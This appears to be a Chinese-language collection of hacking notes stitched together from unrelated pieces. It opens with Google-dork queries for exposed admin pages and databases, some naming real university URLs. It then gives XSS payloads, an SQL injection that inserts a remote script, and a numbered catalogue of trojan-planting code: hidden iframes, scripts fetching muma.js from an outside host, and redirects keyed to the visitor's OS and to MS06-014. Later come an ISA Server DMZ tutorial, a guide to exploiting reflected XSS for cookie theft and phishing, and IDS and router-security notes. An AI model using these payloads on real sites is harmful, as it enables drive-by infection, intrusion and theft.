/**
 *后台文件常见文件名
**/
admin
ad_login
ad_manage
addmember
adduser
adm_login
admin/admin
admin/admin_login
admin/index
admin/manage
adimin_admin
admin_edit
admin_index
admin_Login
login/...
...

/**
 *关键字
**/
密码、用户名、后台账号、会员、会员ID、username、password。。。

/**
 *例子
**/
intext:用户名 inurl:admin/login.asp

/**
 *入侵
**/
绝对的路径 输入保存的路径 输入文件的内容 inurl:diy.asp
inurl:asp?id=
inurl:php?id= site:sohu.com
to parent directory inurl:inetpub
to parent directory mdb -google

///eg
//filetype:mdb
http://proisk.ru/Northwind.mdb

//to parent directory mdb site:edu.cn
http://netcourse.cug.edu.cn:7310/cug/fire_control/INC/_VTI_CNF/
http://netcourse.cug.edu.cn:7310

//to parent directory "conn.asp" site:edu.cn
http://www.tijmu.edu.cn/cn/dxzhx/new/admin/

//inurl:/inc+conn.asp
------

/**
 *防范-----robot.txt
**/
intext:"User-agent:*" inurl:robot.txt
intext:"Mediapartners-Google" inurl:"robots.txt"
intext:"Disallow:" inurl:robots.txt
intext:"Allow:" inurl"robots.txt"

/**
 *常用
**/
allinurl:bbs data
filetype:mdb inurl:database/data
filetype:inc conn
intitile:"index of" data/sh_history/bash_history/passwd

[6] " style="background:url(javascript:alert('Watchfire XSS Test Successful'))" OA="
[7] --><script>alert('Watchfire XSS Test Successful')</script>
[8] '+alert('Watchfire XSS Test Successful')+'
[9] "+alert('Watchfire XSS Test Successful')+"
[10] >'><%00script>alert('Watchfire XSS Test Successful')</script> (.NET 1.1 specific variant)
[11] >"><%00script>alert("Watchfire XSS Test Successful")</script> (.NET 1.1 specific variant)
[12] >+ACI-+AD4-+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-
[13] %A7%A2%BE%Bc%F3%E3%F2%E9%F0%F4%Be%E1%Ec%E5%F2%F4%A8%A7Watchfire%20XSS%20Test%20Successful%A7%A9%Bc%Af%F3%E3%F2%E9%F0%F4%Be

///-------------------------------------
exec('Updata ['+@t+'] set ['+@c+'] = rtrim(convert(varchar,['+#c+']))')  ???
cast("></title><script> src=http://www.xxx.com/xx.js</script><!-- as varchar(67))')f

二:js文件挂马
首先将以下代码
document.write("<iframe width=0 height=0 src=地址></iframe>");
保存为xxx.js，
则JS挂马代码为
<script language=javascript src=xxx.js></script>

三:js变形加密
<SCRIPT language="JScript.Encode" src=http://www.upx.com.cn/muma.txt></script>
muma.txt可改成任意后缀

四:body挂马
<body onload="window.location=地址;"></body>

五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + rn<iframe src="http://www.upx.com.cn/muma.htm/"></iframe>;

六:css中挂马
body {
background-image: url(javascript:document.write("<script src=http://www.upx.com.cn/muma.js></script>"))}

七:JAJA挂马
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>

八:图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>

九:伪装调用：
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

十:高级欺骗
<a href="http://www.163.com(迷惑连接地址，显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

十一:判断系统代码

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>404</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=javascript>
window.status="";
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
window.location.href="tk.htm";
else
window.location.href="upx06014.htm";
</SCRIPT>
</BODY></HTML>

十二:判断是否有ms06014代码

<script language=VBScript>
on error resume next
set server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
else
document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
end if
</script>

十三:智能读取js的代码demo

//读娶src的对象
var v = document.getElementById("advjs");
//读娶src的参数
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute(src));

document.write("<iframe src="http://www.upx.com.cn/1/"+u_num+".htm" width="0" height="0" frameborder="0"></iframe>");
document.writeln("<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content="text/html; charset=big5">");
document.writeln("<META content="MSHTML 6.00.2900.3059" name=GENERATOR></HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style="CURSOR: url(http://www.upx.com.cn/demo.js)">");
document.writeln("<DIV ");
document.writeln("style="CURSOR: url(http://www.upx.com.cn/demo.js)"></DIV></DIV></BODY></HTML>")

//分析src的参数函数
function getUrlParameterAdv(asName,lsURL){

loU = lsURL.split("?");
if (loU.length>1){

var loallPm = loU[1].split("&");

for (var i=0; i<loallPm.length; i++){
var loPm = loallPm[i].split("=");
if (loPm[0]==asName){
if (loPm.length>1){
return loPm[1];
}else{
return "";
}
}
}
}
return null;
}

 首先，我们谈谈为何要部署DMZ区域，也就是说一旦部署了DMZ，他对你的网络产生什么样的积极作用。有些企业可能从ISP申请了一个地址段的IP，但是往往出现这些IP不能有效的利用，构建了DMZ区域后，这些IP可以灵活的分配到DMZ上的主机。此外，从DMZ区域到Internet流动的数据包是被路由的，而不是被NAT，从ISA处理数据包的效率角度讲，前者要优于后者。
 现在，我们来看看要部署DMZ需要哪些条件
 - ISA需要有至少3个网络接口卡
 - ISA Server是做为防火墙模式或者集成模式安装的，可以是单机模式也可以是阵列模式
 - 在IP PACKET Filter的全局设置中，必须启用Enable IP Routing
 - ISP分配了一个地址段的IP给你的公司
 - 配置在ISA外部接口的IP的子网掩码不能与DMZ区域的子网掩码相同

 在这篇文章里，笔者以一个模拟的真实环境来描述DMZ，试验的拓扑如图1所示。

(图1)
 我们假设，你的公司从ISP购买了一个C类的IP段，172.16.1.0/24。我们将172.16.1.33分配给ISA的外部接口。把172.16.1.64/26从172.16.1.0/24划分出来分配给DMZ区域。注意，DMZ区域和ISA外部接口连接的区域是不同的逻辑网络。一个常见的错误是把DMZ区域和ISA外部接口规划在一个IP逻辑网络里。记住，从DMZ和外部网络的通讯角度讲，ISA扮演一个有过滤功能的路由器，而不是网桥，这也是为什么必需要启用Enable IP Routing的原因。

 ISA Server的网络接口配置如下

 Internal NIC
 IP:192.168.100.20/24
 Defaul Gateway(DG):None
 DNS:192.168.100.100

 DMZ NIC
 IP:192.168.100.65/26
 DG:None
 DNS:None

 External NIC
 IP:172.16.1.33/24
 DG:172.16.254
 DNS:10.10.10.10

 DMZ上的主机的网络接口配置
 IP:172.16.1.66-126/26
 DG:172.16.1.65
 DNS:None

 内部网络（Internal）上的计算机
 IP:192.168.100.x/24
 DG:192.168.100.20
 DNS:192.168.100.100

 请特别注意以上的配置。对于ISA来讲，缺省网关一定要配置在外部接口，原因很简单，一个去往未知IP的数据包，目标一定位于Internet上，如果这个IP是在你的公司内部网络，那么你的网络中的路由设置肯定存在问题。既然是去往Internet上的，ISA必须可以将这个数据包从外部接口上送出去，所以缺省网关一定要配置在外部接口上。如果你的其他接口也配置的缺省网关，那么就一定会出现问题，因为默认情况下，各个网络接口上配置的缺省网关的Metric都是1，所以去往未知IP的数据包，就会从所有配置了缺省网关的网卡送出，也就是负载均衡，但是另一个不应该配置缺省网关的网卡不能将数据包成功的送到目的IP，所以导致丢包，甚至无法通讯。内部接口的DNS指向公司内部的DNS服务器。外部接口的DNS指向一个可以解析Internet上所有域名的DNS服务器，这一点很重要，别忘了ISA要代理Web Proxy Client和FWC进行DNS解析。DMZ接口上，我们并没有配置DNS，当然你也可以配置。对于DMZ区域上的主机，我们把网关指向ISA的DMZ网络接口，因为DMZ区域上的主机需要与Internet通讯，确切的讲是被Internet用户访问，而ISA是Internet出口的持有者。DNS指向我们也没有在DMZ上的主机配置，因为DMZ应该是一个无人区，也就是说DMZ上应该是一个服务器农场，而不是被用户使用，浏览Internet的计算机，所以它没有必要配置DNS，除非某台服务器运行的服务必须依赖与DNS。内部网络的主机设置不是此文讨论的重点，所以在这里不展开讨论。
 另外，如果你对路由非常了解，从上边给出的ISA的网络接口配置看，你马上会发现一个问题。ISA外网接口连接172.16.1.0/24网段、而DMZ区域在172.16.1.64/26网段。我们假设这两个网段的物理介质是以太网标准，当172.16.1.64/26网段中的某个主机发起和172.16.1.0/24网段中某台主机通讯时，不妨假设172.16.1.69/26和172.16.1.254/24通讯，对于172.16.1.69/26，它认为172.16.1.254/24和自己不同属一个逻辑网段，所以它知道要把去往172.16.1.254/24的数据包发送给自己的网关172.16.1.65/26，由于172.16.1.69/26和172.16.1.65/26在一个广播域，所以ARP解析不会出现问题。但是反过来，当172.16.1.254/24要路由或者始发一个数据包到172.16.1.69/26时，问题就出现了。对于172.16.1.254/24来讲，它认为172.16.1.69和自己在一个逻辑网段，所以这个数据包应该是直接发送到172.16.1.69/26，因此它就会ARP解析172.16.1.69/26的MAC地址，然而它们并不在同一个广播域，所以这个ARP解析得不到答案，因此这个数据包就无法发送，然而，如果172.16.1.254/24可以成功的把去往172.16.1.69/26的数据包发送给172.16.1.33/24，也就是ISA Server，则这个数据包就可以被最终送往172.16.1.69/26。要解决这个问题，我们应该从两个方面出发。如果ISA Server连接ISP的链路层协议是通过广播技术寻址的，则解决的方法有3种，一是，与你的ISP联系，使得和ISA相连的路由器中有一条明确的到172.16.1.64/26网络下一跳为172.16.1.33/24的路由；二是，在ISA上实施一种对于链路层寻址的欺骗手段，例如，以太网的链路层寻址是通过ARP协议，所以你的ISA计算机上必须可以实现Proxy ARP功能，使得ISA计算机可以以自己外网接口的MAC地址回应对172.16.1.64/26网络中主机的ARP查询；三是，把172.16.1.0/24和172.16.1.64/26网络规划到一个广播域之中，如果采用这种方法，请注意ISA只能做“半过滤”来保护DMZ区域，但是这种保护也是有效的。换句浅显易懂的话说，从外网到DMZ区域的数据包是直接发送的，但是从DMZ区域到外网的数据包是经由ISA Server送出到外网的。如果，ISA Server连接ISP的链路层协议是点对点的，那么你不用做任何事情，因为只要是去往172.16.1.x的数据包，不论子网掩码是24位还是26位还是27位，数据包都会正确无误的发送到你的ISA Server的外网接口。在笔者的测试环境中，ISA和ISP的路由器之间的链路层协议是以太网，笔者对这个路由器有管理权力，所以采用了在路由器上添加路由的方法解决上述问题。

 请在你安装ISA Server之前，将这些配置设置好。一旦安装好ISA Server，在ISA计算机上添加或者删除网卡可能会引起意想不到的错误。此外，最好在安装好ISA Server后，不要修改IP的配置，如果你不得不这样做，请遵循以下步骤：
 1， 在命令行中输入net stop mspfltex
 2， 在命令行中输入net stop gksvc
 3， 在命令行中输入net stop IPNAT
 4， 修改相应网卡的IP设置
 5， 在命令行中输入net start mspfltex
 6， 在命令行中输入net start IPNAT
 7， 在命令行中输入net start isactrl
 8， 在命令行中输入net start “Microsoft Web Proxy”
 9， 在命令行中输入net start “Microsoft Firewall”
 10，在命令行中输入net start “Microsoft Scheduled Cache Content Download”

 为了验证网络层的连通性，我们通常会使用Ping工具。Ping工具实际上是ICMP协议的一种应用实例。为了实现目的，你需要对ICMP协议有一些了解。当一台主机Ping一个远端计算机时，会以ICMP协议 类型8 代码0（也就是通常所说的ICMP Ping Query或者是ICMP Ping Request）封装一个数据包发送出去，当远端计算机收到这个数据包后，会以ICMP 协议类型0代码0封装（ICMP Ping Reply）回应的数据包发送给源端。为了使DMZ上的主机可以Ping通Internet上的主机，你需要允许DMZ主机发送的ICMP Ping Query能够被ISA Server发送到Internet上，反过来，要允许ICMP Ping Reply进入到DMZ区域。这需要你在IP PACKET FILTER中建立2个封包过滤，具体内容如图2－图9。

 完成之后，等待一会儿以便新建的封包过滤生效，也可以重新启动一下Firewall Service服务。之后验证DMZ的主机是否可以Ping通Internet上的主机（也就是我们模拟的10.10.10.10那台计算机）。没有问题，DMZ和Internet的网络层确实具有连通性，但是反过来10.10.10.10却无法Ping通DMZ上的主机，也许这恰巧是你的愿望。如果你希望Internet的主机可以Ping通DMZ的主机，也很简单，只要把刚才建立的2个封包过滤的Direction 设置为Both即可，原理不再冗述。讲到这里，如果你希望Internet上的计算机可以Ping通你的ISA Server的外部接口，就会变得极其简单，笔者也就不必浪费笔墨。值得注意的是你不需要添加2个封包过滤，而是1个，如果你注意到IP PACKET FILTER中，已经有默认的名为ICMP outbound的封包过滤就不难理解，这个封包过滤允许ICMP 所有类型和代码的数据包从ISA的外部接口送出，也就是说你只需为进入的ICMP Ping Query设置一个允许的封包过滤即可。如果你想了解ICMP协议的更多细节，可以参考TechNet CD或者微软帮助站点中的Q170292文档。

 在验证了DMZ区域和Internet的网络层连通性后，我们要立刻切入正题：实现对DMZ区域的应用。我们的目的是要使得DMZ区域的各种服务能够被Internet上的用户访问。你可以将Web服务、FTP服务、邮件服务等等部署在DMZ区域，从而提供Internet用户的访问。笔者举3个典型的例子来说明ISA如何发布DMZ区域的服务器。

发布DMZ区域的Web服务
     1. 首先，设置好DMZ区域的Web 服务器，默认情况下它应该在80端口监听Web请求,如图10。设置完成后，请利用netstat 工具查看Web服务器是否在0.0.0.0上监听80端口（笔者假设你没有禁用SocketPooling）
   2. 在ISA Server上利用IP PACKET FILTER将Web服务发布。其实说发布有些过于牵强，ISA实际上是一个具有过滤功能的路由器，所以我们只是允许来自Internet用户的Web请求可以进入到DMZ上的Web服务器。设置的内容如图11－图14所示。
   3. 在Internet上的计算机验证是否可以正确访问位于DMZ区域的Web服务器。可以看到我们可以正确的访问Web页面，正如图15显示的那样。在验证之前，你应该等待一会儿以使刚刚建立的封包过滤生效，或者重新启动Firewall Service服务。

 完成了，上边的设置后，不仅Internet上的用户可以访问这台Web服务器，ISA Server连接的内部网络中的用户也可以访问，因为我们在图14中的Remote Computer中选择的是All Remote Computers。

发布DMZ区域的FTP服务

 由于FTP有两种工作模式，PORT和PASV模式，具体区别详见本刊杂志2002年第九期《浅析FTP工作原理》。

 发布PORT模式的FTP的步骤如下
  1，设置好DMZ区域的FTP服务器，使其在21端口上监听。如图16。当然你也可以使用其他端口，只不过要在配置IP PACKET FILTER时要做相应的调整。
  2，不论哪种模式的FTP，都需要允许远端用户连接FTP服务器21端口的进入请求，所以需要为此建立一个封包过滤，具体设置如图17－图20。
  3，为FTP的数据通道的建立设置一个封包过滤。由于PORT模式的数据通道的建立请求是由FTP服务器主动发起的，所以封包过滤的direction 应该是Outbound而不是Inbound。具体的设置如图21－图22。

 发布PASV模式的FTP的步骤如下
  1，设置FTP服务器在21端口监听，如上边所述
  2，由于PASV模式的所有连接都是有FTP客户端发起的，并且使用的端口并不是固定的，因此只需要一个“非安全”的封包过滤即可完成PASV模式的FTP服务器发布。如图23－图26。

 完成FTP的发布后，我们在Internet上的FTP客户端验证是否可以正确的以PORT和PASV模式连接到位于DMZ的FTP服务器，可以看到，如图27和图28，连接成功。在发布PASV模式的FTP服务器时，我们设置了一个安全性较差的封包过滤，但是这也是发布位于DMZ区域的PASV模式FTP的无奈之举。因为我们知道FTP的数据通道使用的端口是动态的，而且动态的范围我们不易控制，特别是使用微软IIS中提供的FTP服务，我们根本无法控制。不过你可以选择另一款FTP服务器端软件：ServU。这个服务器端软件可以控制PASV模式建立数据通道时使用的端口范围，通过设置这个端口范围我们可以控制本地FTP数据通道使用的端口，但是相应的，在IP PACKET FILTER中的设置也会麻烦许多，你要为这个端口范围中包含的所有端口都设置一个进入的封包过滤。如果你对安全性很重视，这个一劳永逸但是绝对麻烦的工作还是有必要的。笔者认为，将FTP服务器部署在DMZ区域也许并不是一个明智之举，除非你可以承受这台FTP服务器可以受到攻击的事实，或者你放弃使用PASV模式的FTP。然而，将FTP服务器部署在内部网络，可以在保证安全性的前提下（甚至是加强安全性）减轻许多工作，因为动态端口的问题你不必劳神，FTP Application Filter和MS Proxy Protocol可以很好的为你解决，有关在内部网络部署FTP服务器的问题请参考《使用ISA Server发布非标准端口的FTP服务器》以及《用ISA Server 2000发布内部网络的IIS FTP 服务器》。

 此外，如果你决定为在DMZ区域部署的FTP设置那个“非安全”封包过滤，笔者有必要做一些安全警告：你的这台FTP服务器完全暴露给Internet上的所有用户，任何Internet用户可以连接这台服务器的任意端口。ISA Server唯一可以做的是利用IP PACKET FILTER中的全局配置（Instruction Detection ）为这台FTP服务器做一些保护。在这种情况下，你可以在FTP服务器上，安装一款单机版的防火墙软件来加强对这台服务器的保护，这种保护是确实有效的，但是相应的也会增加成本。笔者推荐以下几款单机版防火墙软件：Norton Internet Security、BlackICE、ZoneAlarm、天网防火墙。

 下边，笔者介绍一个很有意思的发布DMZ区域的Mail Relay Server的案例。在很多企业中，邮件服务是非常重要的，所以要有一种可行的措施有效的保护企业内部的邮件服务器不被攻击。如果这个邮件服务器必须被漫游的用户使用，那么这台邮件服务器就必须可以通过Internet被访问，这样就面临两种选择，一是把邮件服务器部署在内部网络，然后通过ISA发布出去；另一种是把邮件服务器部署在DMZ区域利用IP PACKET FILTER发布。我们可以综合一下以上两种方案的安全和性能的平衡点，把邮件服务器部署在内部网络，在DMZ区域部署一台邮件转发服务器，通过ISA只发布位于DMZ区域的邮件转发服务器，这样不仅可以有效的保护邮件系统的真实宿主不被攻击，因为你发布的只是一个邮件转发服务器，同时也能够利用邮件转发服务器和ISA的SMTP Filter实施分级的邮件过滤。

 完成这个发布工作我们需要做以下几件事情
 - 在企业内部部署Exchange Server 2000（本文不讨论）
 - 在DMZ区域部署邮件转发服务器
 - 发布内部网络的邮件服务器给DMZ区域的邮件转发服务器
 - 利用IP PACKET Filter发布邮件转发服务器

　　XSS的类型大体分为两种：反射型XSS和持久型XSS，相比之下，后者的利用要比前者方便许多。甚至许多人认为反射型的XSS是鸡肋，因为其利用起来很不方便，但在安全技术飞速发展的今天，鸡肋也有变鸡翅的一天。下面我们来看看什么是反射型XSS.

　　什么是反射型XSS

　　XSS又叫CSS (Cross Site Script) ，跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意攻击用户的特殊目的。

　　那么什么是反射型XSS呢?黑哥对我讲的是形如"http://www.jpl.nasa.gov/about_JPL/maps.cfm?departure=lax%22%3Cimg%20src=k.png%20onerror=alert(%22XSSed%20by%20sH%22)%20/%3E"这样需要欺骗用户自己去点击链接才能触发XSS的是反射型XSS，如在论坛发贴处的XSS就是持久型的XSS.

　　非持久性XSS(Reflected cross-site scripting)，是我们通常所说的反射型XSS，也是最常用，使用最广的一种方式。它通过给别人发送带有恶意脚本代码参数的URL，当URL地址被打开时，特有的恶意代码参数被HTML解析、执行。它的特点是非持久化，必须用户点击带有特定参数的链接才能引起。

　　持久性XSS(Persistent cross-site scripting)，指的是恶意脚本代码被存储进被攻击的数据库，当其他用户正常浏览网页时，站点从数据库中读取了非法用户存入非法数据，恶意脚本代码被执行。这种攻击类型通常在留言板等地方出现。

　　很多人非常鄙视非持久性XSS(反射型XSS)，认为这种XSS只能依靠欺骗的手段去骗人点击，才能让攻击正常实施起来。其实让反射型XSS变得持久的方法，已经出现过好多次了。比如利用applet、利用flash的AS脚本、利用IE的Ghost 页面，Cross Iframe Trick等等。

　　反射型XSS的常见利用方法

　　既然是“需要欺骗用户自己去点击链接才能触发XSS”，那利用反射型XSS岂不是只有去忽悠用户这一种方法?放在几年前也许是这样的，现如今，就要上演鸡肋变鸡翅的好戏了!

　　·欺骗

　　不得不说这是最简单有效的利用方法了，但对忽悠的能力有严格的要求，不然用户不会那么容易上钩的。其次，现在的用户都有了一定的安全意识，也不是那么好骗了。以上面提到的链接为例，由于是NASA网站的跨站，大家完全可以在一些天文爱好者聚集的群里发类似这样的消息，如：“美国航空航天局公布最新UFO照片”然后加上我们的链接。由于是NASA的链接(现在连小学生都知道NASA是干什么的)，我想应该会有一部分人相信而去点击从而达到了我们的目的，这个反射型的XSS被触发。但如果不是这么碰巧呢?请往下看。

　　·ClickJacking

　　在去年的OWASP会议上，ClickJacking这种攻击方式被提了出来。简单来说ClickJacking大致是这么回事：

　　1. 表现为点击某个链接或button时，实际上是点击到别的地方去了(劫持链接)

　　2. 不一定需要javascript，所以noscript也挡不住，但是如果有javascript会让事情更简单

　　3. 攻击是基于DHTML的

　　4. 需要攻击者一定程度上控制页面

　　所以，我们只要将用户的点击劫持到我们的链接上去就行了，而且ClickJacking是可以跨域的哦~

　　具体应用示例大家去google下就有了。

　　·结合CSRF技术

　　CSRF是伪造客户端请求的一种攻击，CSRF的英文全称是Cross Site Request Forgery，字面上的意思是跨站点伪造请求。这种攻击方式是国外的安全人员于2000年提出，国内直到06年初才被关注。

　　结合CSRF技术来利用反射型XSS是种不错的方法，利用CSRF可以使得这些不好利用的XSS漏洞变得威力无穷。具体示例请参考余弦的《基于CSRF的XSS攻击》(http://huaidan.org/archives/2561.html)，这里就不细说了，有机会专门写篇关于CSRF的paper.

　　·Cross Iframe Trick

　　先讲讲这种攻击能够达成什么效果：

　　1. 跨域执行脚本(IE、Firefox)

　　2. 把非持久性XSS变成持久性XSS ——>!!!

　　3. 跨页面执行脚本

　　这种攻击方法比较绕，具体请参考《Cross Iframe Trick》(http://hi.baidu.com/aullik5/blog/item/07d68eb015d72652092302b1.html)

　　·反转雅典娜——配合Anehta的回旋镖模块

　　什么是Anehta? Anehta是一个跨站脚本攻击(XSS)的利用平台。功能模块化，开发者可以单独为anehta开发各种各样的模块，以满足独特的需求。Anehta中有许多的具有创意的设计，回旋镖模块(Boomerang)，就是其中一个。回旋镖模块的作用，是为了跨域获取本地cookie，只是在站点上有一个XSS，种类不限，不管是反射型XSS，还是持久型XSS，都可以为我们工作。

　　这时，反射型XSS的余热就被充分的发挥了。

　　浅析Anehta回旋镖模块工作原理

　　既然提到了Anehta的Boomerang模块，那就简单说说吧。

　　Boomerang的工作原理：我们知道，浏览器被XSS攻击后，攻击者可以用js或其他脚本控制浏览器的行为。这时候如果我们强制浏览器去访问站点B上一个存在XSS漏洞的页面，就可以继续用B站上的XSS_B控制用户的浏览器行为; 那么把整个过程结合起来，简单表示如下：

　　victim Browser ——>site A，XSS_A —— redirect to ——>Site B，XSS_B —— redirect somewhere ——>……

　　在IE中，iframe、img等标签都是拦截本地cookie的。需要使用不拦截cookie的比如 window.open等方法，但是window.open会被IE拦截弹出窗口，所以axis牛在Boomerang中使用了表单提交，构造一个form，向site B提交，然后再从Site B导入一个XSS B，获取了cookie后，再通过表单提交，跳转回原来的Site A.如果在Site B上，使用XSS_B再将页面重新定向回 Site A，那么对于用户来说，就是简单的闪了一下，非常具有欺骗性，整个过程就像用回旋镖扔出去打了一下B一样。

　　但其实这并没有把反射型XSS真正的变成持久型的XSS，只是反射型XSS的一种攻击方式而已，也没有跨域，而是URL重定向转了一圈，跳了一圈又回来了。但这确实是让反射型XSS得到了充分的利用，达到了我们的目的。axis牛的这种思路非常值得我们学习!

　　小结

　　本文只总结了常见的反射型XSS利用的方法，但都是简单的提了下，起到了个抛砖引玉的作用，让大家见到反射型XSS时能想到这些(貌似要都详细写出来就太多了- -：)，如有不足之处还请各位见谅。

审计技术：产生、记录并检查按时间顺序排列的系统事件记录的过程。

审计的目标：

­            确定和保持系统活动中每个人的责任

­            重建事件

­            评估损失

­            检测系统的问题区

­            提供有效的灾难恢复

­            组织系统的不正当使用

审计的前提：有一个支配审计的规则集。

规则集：通常以安全策略的形式明确表述。

精简审计，风险和威胁分类。

实时入侵检测系统，提出反常活动与计算机不正当使用之间的相关性。

基于主机的入侵检测

基于主机和基于网络入侵检测的集成

《Computer Security Threat Monitoring and Surveillance》, James P. Anderson

《计算机安全威胁监控与监视》

­            精简审计的目标在于从安全审计跟踪数据中消除冗余或无关的记录。

­            计算机系统威胁分类：外部渗透、内部渗透和不法行为。

­            提出了利用审计数据跟踪监视入侵活动的思想。

NSM(Network Security Minitor)

­            第一次将网络流作为审计数据的来源，因而可以在不将审计数据转换成统一格式的情况下监控异形主机。

­            两大阵营正式成立：基于网络的IDS和基于主机的IDS

DIDS //???

最早试图把基于主机和网络监视的方法集成在一起。

三个功能部件：信息收集、信息分析、信息处理。

1．信息收集：

系统或网络的日志文件。日志中记录了行为类型及其信息。

如“用户活动”：

­            信息：登陆，用户ID改变，用户对文件的访问，授权，认证信息等。

­            不期望的行为：重复登陆失败，登录到不期望的位置，非授权的企图访问重要文件等。

2．信息分析：

模式匹配（误用检测）

­            将收集到的信息与已知网络入侵和系统误用模式的数据库进行比较，从而发现违背安全策略的行为。

­            一般一个进攻模式可以用一个过程（如执行一条指令）或一个输出（如获得权限）来表示。该过程可以很简单（如通过字符串匹配以寻找一个简单的条目或指令），也可以很复杂（如利用正规的数学表达式来表示安全状态的变化）。

统计分析（异常检测）

­            首先给系统对象（如用户、文件、目录和设备等）创建一个统计描述，统计正常使用时的一些测量属性（如访问次数、操作失败次数、延时等）。

­            测量属性的平均值将被用来与网络、系统的行为进行比较，任何观察值在正常范围之外时，就认为有入侵发生。

完整性分析（往往用于事后分析）

­            主要关注某个文件或对象是否被更改。经常包括文件和目录的内容和属性，它在发现被更改的、被安装木马的应用程序方面特别有效。

3．信息处理

　　不可忽视的路由器安全

　　路由器(Router)是因特网上最为重要的设备之一，正是遍布世界各地的数以万计的路由器构成了因特网这个在我们的身边日夜不停地运转的巨型信息网络的“桥梁”。在因特网上，路由器扮演着转发数据包“驿站”的角色，对于黑客来说，利用路由器的漏洞发起攻击通常是一件比较容易的事情，攻击路由器会浪费CPU周期，误导信息流量，使网络陷于瘫痪，通常好的路由器本身会采取一个好的安全机制来保护自己，但是仅此一点是远远不够的，保护路由器安全还需要网管员在配置和管理路由器过程中采取相应的安全措施。

　　路由器数据流示意图

　　流行的路由器大多是以硬件设备的形式存在的，但是在某些情况下也用程序来实现“软件路由器”，两者的唯一差别只是执行的效率不同而已。路由器一般至少和两个网络相联，并根据它对所连接网络的状态决定每个数据包的传输路径。路由器生成并维护一张称为“路由信息表”的表格，其中跟踪记录相邻其他路由器的地址和状态信息。

　　路由器使用路由信息表并根据传输距离和通讯费用等优化算法来决定一个特定的数据包的最佳传输路径。正是这种特点决定了路由器的“智能性”，它能够根据相邻网络的实际运行状况自动选择和调整数据包的传输情况，尽最大的努力以最优的路线和最小的代价将数据包传递出去。路由器能否安全稳定地运行，直接影响着因特网的活动，不管因为什么原因出现路由器死机、拒绝服务或是运行效率急剧下降，其结果都将是灾难性的。

　　路由器的安全剖析

　　路由器的安全性分两方面，一方面是路由器本身的安全，另一方面是数据的安全。由于路由器是互联网的核心，是网络互连的关键设备，所以路由器的安全要求比其他设备的安全性要求更高，主机的安全漏洞最多导致该主机无法访问，路由器的安全漏洞可能导致整个网络不可访问。

　　路由器的安全漏洞可能存在管理上的原因和技术上的原因。在管理上，对路由器口令糟糕的选择、路由协议授权机制的不恰当使用、错误的路由配置都可能导致路由器工作出现问题，技术上路由器的安全漏洞可能有恶意攻击，如窃听、流量分析、假冒、重发、拒绝服务、资源非授权访问、干扰、病毒等攻击。此外，还有软件技术上的漏洞，诸如后门、操作系统漏洞、数据库漏洞、TCP/IP协议漏洞、网络服务等都可能会存在漏洞。

　　为了使路由器将合法信息完整、及时、安全地转发到目的地，许多路由器厂商开始在路由器中添加安全模块，比如将防火墙、VPN、IDS、防病毒、URL过滤等技术引入路由器当中，于是出现了路由器与安全设备融合的趋势。从本质上讲，增加安全模块的路由器，在路由器功能实现方面与普通路由器没有区别，所不同的是，添加安全模块的路由器可以通过加密、认证等技术手段增强报文的安全性，与专用安全设备进行有效配合，来提高路由器本身的安全性和所管理网段的可用性。

　　而为了保护路由器安全，我们还必需考虑路由器的配置问题。一般来说路由器的配置方式可以通过用主控Console口接终端配置;在AUX口接Modem同电话网相连，从而在远端配置;在TCP/IP网上可通过仿真终端(virtual termianl)telnet配置;可以从TFTP Server上下载配置，另外，还可以用网管工作站进行配置。路由器攻击造成的最大威胁是网络无法使用，而且这类攻击需要动用大量靠近骨干网络的服务器。其实，路由器有一个操作系统，也是一个软件，相对其他操作系统的技术性来说，差距是非常明显的，由于功能单一，不考虑兼容性和易用性等，核心固化，一般管理员不允许远程登录，加上了解路由器的人少得很，所以它的安全问题不太明显，有时候偶尔出现死机状态，管理员一般使用reboot命令后，也就没什么问题了。

　　也正因为这样，致使很多路由器的管理员对这个不怎么关心，只要网络畅通就可以了，因为路由器通常都是厂家负责维护的。甚至有些厂家总爱附带一句说:“如果忘记了口令，请和经销商联系。”事实上，连Unix都有很多漏洞，何况路由器脆弱的操作系统?当然路由器一般是无法渗入的。因为，你无法远程登录，一般管理员都不会开的。但是让路由器拒绝服务的漏洞很多。而且，很多管理员有个毛病，他们往往对Windows的操作系统补丁打得比较勤，但是对路由器的操作系统的补丁，很多管理员都懒得去理。

　　路由器五大类安控技术

　　访问控制技术：用户验证是实现用户安全防护的基础技术，路由器上可以采用多种用户接入的控制手段，如PPP、Web登录认证、ACL、802.1x协议等，保护接入用户不受网络攻击，同时能够阻止接入用户攻击其他用户和网络。基于CA标准体系的安全认证，将进一步加强访问控制的安全性。

